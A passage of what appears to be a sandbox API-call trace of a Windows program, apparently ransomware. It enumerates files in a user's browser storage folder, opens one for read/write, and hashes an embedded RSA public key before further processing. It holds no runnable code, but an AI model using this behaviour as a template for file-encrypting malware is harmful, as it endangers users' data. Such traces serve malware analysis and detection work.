| out: hHeap=0x630000) returned 1 [0238.066] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0238.066] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0238.066] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0238.066] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.066] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0238.066] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0238.066] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0238.067] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.067] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0238.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0238.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0238.067] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.067] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0238.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0238.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0238.067] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.067] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0238.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0238.067] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\") returned="3O75JDME\\" [0238.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0238.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x3185e38 [0238.067] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0238.067] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\") returned="DOMStore\\" [0238.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6960 [0238.067] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3185e38 | out: hHeap=0x630000) returned 1 [0238.067] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\") returned="Internet Explorer\\" [0238.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a20 [0238.067] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0238.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6951f0 [0238.068] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6960 | out: hHeap=0x630000) returned 1 [0238.068] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0238.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0238.068] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6951f0 | out: hHeap=0x630000) returned 1 [0238.068] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0238.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5808 [0238.068] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0238.068] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0238.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37cf6d8 [0238.068] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5808 | out: hHeap=0x630000) returned 1 [0238.068] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0238.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0238.068] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37cf6d8 | out: hHeap=0x630000) returned 1 [0238.068] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0238.068] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0238.068] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0238.068] PathFindFileNameW (pszPath="") returned="" [0238.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0238.068] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x605dd8a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x605dd8a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0238.070] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0238.070] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x605dd8a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x605dd8a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0238.070] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x605dd8a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x605dd8a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x696aec80, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="www.google[1].xml", cAlternateFileName="WWWGOO~1.XML")) returned 1 [0238.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0238.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11e) returned 0x3192918 [0238.070] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0238.070] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\www.google[1].xml") returned=".xml" [0238.070] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\www.google[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\3o75jdme\\www.google[1].xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0238.072] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=13) returned 1 [0238.072] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0238.075] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0238.075] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0xd, lpOverlapped=0x0) returned 1 [0238.076] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0238.076] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0238.076] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0238.076] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0238.076] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x6951f0) returned 1 [0238.078] CryptCreateHash (in: hProv=0x6951f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0238.078] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0238.078] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0238.078] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0238.078] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0238.078] GetLastError () returned 0x0 [0238.078] CryptDestroyHash (hHash=0x31de170) returned 1 [0238.078] CryptReleaseContext (hProv=0x6951f0, dwFlags=0x0) returned 1 [0238.078] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0238.078] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0238.078] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0238.078] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0238.078] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0238.078] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0238.078] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0238.078] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0238.078] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0238.078] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x31c0d08 [0238.078] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0238.079] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0238.079] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0238.079] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37cf6d8 [0238.079] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bcaf8 [0238.079] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37cf720 [0238.079] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bcb10 [0238.079] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bcb40 [0238.079] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bcba0 [0238.079] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bcb58 [0238.079] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0238.079] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0238.079] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0238.079] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0238.079] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcb40 | out: hHeap=0x630000) returned 1 [0238.079] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcb58 | out: hHeap=0x630000) returned 1 [0238.079] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcba0 | out: hHeap=0x630000) returned 1 [0238.079] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0238.079] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0238.079] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bcba0 [0238.080] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0238.080] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bcb58 [0238.080] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0f28 [0238.080] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x37bcb40 [0238.080] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0238.080] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0238.080] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0238.080] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0238.080] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0238.080] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0238.080] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0238.080] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0238.080] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0238.080] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcb58 | out: hHeap=0x630000) returned 1 [0238.080] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0238.080] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcb40 | out: hHeap=0x630000) returned 1 [0238.080] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0238.080] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0238.080] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcba0 | out: hHeap=0x630000) returned 1 [0238.081] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0238.081] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0238.081] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b88 | out: hHeap=0x630000) returned 1 [0238.081] GetCurrentThreadId () returned 0x314 [0238.081] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0238.081] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c7250 [0238.081] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0238.081] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6951f0 [0238.081] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0238.081] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0238.081] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0238.081] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0238.081] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0238.081] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0238.081] GetCurrentThreadId () returned 0x314 [0238.081] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0238.081] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0238.081] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x3195950 [0238.081] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0238.081] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0238.082] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0238.082] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0238.082] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3195950 | out: hHeap=0x630000) returned 1 [0238.082] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3195950 [0238.082] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0238.082] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0238.082] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0238.082] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x72aea0 [0238.082] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0238.082] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bcba0 [0238.082] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0238.082] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0238.082] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0238.082] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0238.082] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0238.082] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0238.082] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0238.082] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0238.082] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bcb40 [0238.082] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0238.082] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0238.083] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0238.083] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0238.083] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0238.083] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0238.083] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0238.083] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bcb58 [0238.083] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0238.083] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0238.083] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0238.083] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bcb28 [0238.083] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0238.083] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bcbb8 [0238.083] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0238.083] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0238.083] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0238.083] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bcb88 [0238.083] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0238.083] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bcb70 [0238.083] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0238.084] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bcbd0 [0238.084] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcb70 | out: hHeap=0x630000) returned 1 [0238.084] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bcb70 [0238.084] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcb88 | out: hHeap=0x630000) returned 1 [0238.084] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed28 [0238.084] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0238.084] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0238.084] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0238.084] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0238.084] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcb40 | out: hHeap=0x630000) returned 1 [0238.084] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bcb40 [0238.084] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0238.084] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x325fd48 [0238.084] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcba0 | out: hHeap=0x630000) returned 1 [0238.084] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6d60 [0238.084] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcbd0 | out: hHeap=0x630000) returned 1 [0238.084] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x37b5b70 [0238.084] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0238.084] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x319bc40 [0238.084] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0238.084] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6c48 [0238.085] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcb40 | out: hHeap=0x630000) returned 1 [0238.085] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x37b5d88 [0238.085] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6d60 | out: hHeap=0x630000) returned 1 [0238.085] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31b6580 [0238.085] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0238.085] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6951f0 | out: hHeap=0x630000) returned 1 [0238.085] HeapFree (in: hHeap=0x630000, 